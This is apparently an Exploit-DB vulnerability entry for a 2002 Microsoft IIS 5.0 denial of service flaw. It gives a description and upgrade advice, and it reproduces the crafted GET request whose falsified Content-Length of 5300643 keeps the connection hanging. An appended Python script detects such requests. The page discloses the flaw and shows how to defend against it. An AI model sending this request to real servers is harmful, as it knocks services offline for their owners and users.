Vendor: IIS 5.0
By: SecurityFocus
CVSS: 7.5 (HIGH)
Denial of Service
CWE: N/A
Product Name: IIS 5.0
Affected Version From: IIS 5.0
Affected Version To: IIS 5.0
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:iis:5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft IIS 5.0 Denial of Service Vulnerability

Microsoft IIS 5.0 may be prone to a denial of service condition when sent a specially crafted malformed HTTP GET header. If an IIS 5.0 web server is sent a crafted HTTP GET request which contains a falsified and excessive 'Content-Length' field, it behaves in an unusual manner. The server keeps the connection open and does not time out, but does not respond otherwise. It is possible that this may be used to cause a denial of service to the web server.

Mitigation:

Upgrade to the latest version of IIS 5.0 to mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3667/info

The following HTTP GET Header, containing a falsified Content-Length field, is sufficient to cause the unexpected behavior:

GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic
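
A defensive check for the condition described above, as an added example that is not part of the original advisory: it parses a captured request and reports when the declared Content-Length is not matched by the body actually received. The function names, the 1 MiB limit and the sample requests are assumptions constructed for illustration.

```python
"""Flag HTTP requests whose declared Content-Length is not backed by a received body."""

MAX_BODY = 1_048_576            # assumed policy limit (1 MiB), not from the advisory
BODILESS = {"GET", "HEAD"}      # methods that normally carry no request body


def parse_request(raw: bytes):
    """Split a captured request into (method, headers, body bytes received)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("header block not terminated")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers, body


def findings(raw: bytes, max_body: int = MAX_BODY):
    """Return the reasons a request should be rejected or put on a read deadline."""
    method, headers, body = parse_request(raw)
    declared = headers.get("content-length")
    if declared is None:
        return []
    if not (declared.isascii() and declared.isdigit()):
        return ["non-numeric Content-Length"]
    out, n = [], int(declared)
    if method in BODILESS and n > 0:
        out.append(f"{method} declares a {n}-byte body")
    if n > max_body:
        out.append(f"declared body exceeds limit of {max_body} bytes")
    if len(body) < n:
        out.append(f"body incomplete: {len(body)} of {n} bytes received")
    return out


# Constructed samples; the first mirrors the method, path and length shown above.
STALLED = (b"GET /testfile HTTP/1.1\r\nHost: 192.168.0.10\r\n"
           b"Connection: Keep-Alive\r\nContent-Length: 5300643\r\n\r\n")
NORMAL = b"POST /form HTTP/1.1\r\nHost: 192.168.0.10\r\nContent-Length: 3\r\n\r\na=1"

if __name__ == "__main__":
    for label, raw in (("stalled", STALLED), ("normal", NORMAL)):
        print(label, findings(raw) or "ok")
```

In a server or proxy, the same three conditions map to rejecting the request outright or enforcing a read deadline on the outstanding body.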